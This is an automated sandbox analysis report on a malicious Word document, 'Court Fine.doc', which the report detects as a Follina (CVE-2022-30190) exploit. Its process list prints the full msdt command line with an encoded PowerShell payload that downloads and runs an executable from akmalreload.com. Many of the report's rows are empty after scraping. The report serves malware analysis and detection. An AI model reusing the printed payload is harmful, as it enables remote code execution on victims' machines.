Windows
Analysis Report
Court Fine.doc
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- WINWORD.EXE (PID: 6316 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Office16\ WINWORD.EX E" /Automa tion -Embe dding MD5: 0B9AB9B9C4DE429473D6450D4297A123) - MSOSYNC.EXE (PID: 6464 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\M soSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C) - msdt.exe (PID: 5804 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d PCWDiagn ostic /ski p force /p aram "IT_R ebrowseFor File=cal?c IT_Launch Method=Con textMenu I T_SelectPr ogram=NotL isted IT_B rowseForFi le=h$(Invo ke-Express ion($(Invo ke-Express ion('[Syst em.Text.En coding]'+[ char]58+[c har]58+'UT F8.GetStri ng([System .Convert]' +[char]58+ [char]58+' FromBase64 String('+[ char]34+'R 2V0LVByb2N lc3MgLU5hb WUgbXNkdHx TdG9wLVByb 2Nlc3M7cG9 3ZXJzaGVsb CAtbm9wIC1 jIE5ldy1Jd GVtIC1QYXR oICJDOlwiI C1OYW1lICJ 0ZW1wIiAtS XRlbVR5cGU gRGlyZWN0b 3J5CihOZXc tT2JqZWN0I FN5c3RlbS5 OZXQuV2ViQ 2xpZW50KS5 Eb3dubG9hZ EZpbGUoImh 0dHBzOi8vY WttYWxyZWx vYWQuY29tL 3N0cnVrL3B yb2plY3QuZ XhlIiwiQzp cdGVtcFxwc m9qZWN0LmV 4ZSIpClN0Y XJ0LVByb2N lc3MgKCJDO lx0ZW1wXHB yb2plY3QuZ XhlIik='+[ char]34+') )'))))i/.. /../../../ ../../../. ./../../.. /../../../ Windows/Sy stem32/mps igstub.exe IT_AutoTr oubleshoot =ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 3620 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \5xjziuml\ 5xjziuml.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 1100 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S4E28.tmp" "c:\Users \user\AppD ata\Local\ Temp\5xjzi uml\CSCF16 D2975B7774 203A88B71A 973285B7C. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 5100 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \0e51okyq\ 0e51okyq.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 4008 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S995A.tmp" "c:\Users \user\AppD ata\Local\ Temp\0e51o kyq\CSCC7D 9E81B474B4 2B68F5EB6C B9C3BA6BD. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- powershell.exe (PID: 5176 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -c Ne w-Item -Pa th C:\ -Na me temp -I temType Di rectory MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
| |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
Click to see the 3 entries |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Extracted files from sample: |
Source: | HTTPS traffic detected: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Section loaded: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process created: | ||
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Window / User API: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 23 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | ReversingLabs | Document-Word.Trojan.Heuristic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Metadefender | Browse | ||
0% | ReversingLabs | |||
0% | Metadefender | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
akmalreload.com | 172.67.190.5 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
